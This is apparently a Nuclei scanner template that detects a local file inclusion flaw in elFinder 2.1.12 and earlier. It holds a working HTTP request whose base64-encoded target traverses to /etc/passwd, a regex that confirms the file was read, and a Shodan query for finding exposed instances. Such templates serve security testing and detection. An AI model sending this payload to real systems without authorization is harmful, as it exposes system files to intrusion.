37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: elFinder-path-traversal
|
|
|
|
info:
|
|
name: elFinder <=2.1.12 - Local File Inclusion
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: |
|
|
elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
|
|
reference:
|
|
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: title:"elfinder"
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
tags: lfi,elfinder
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|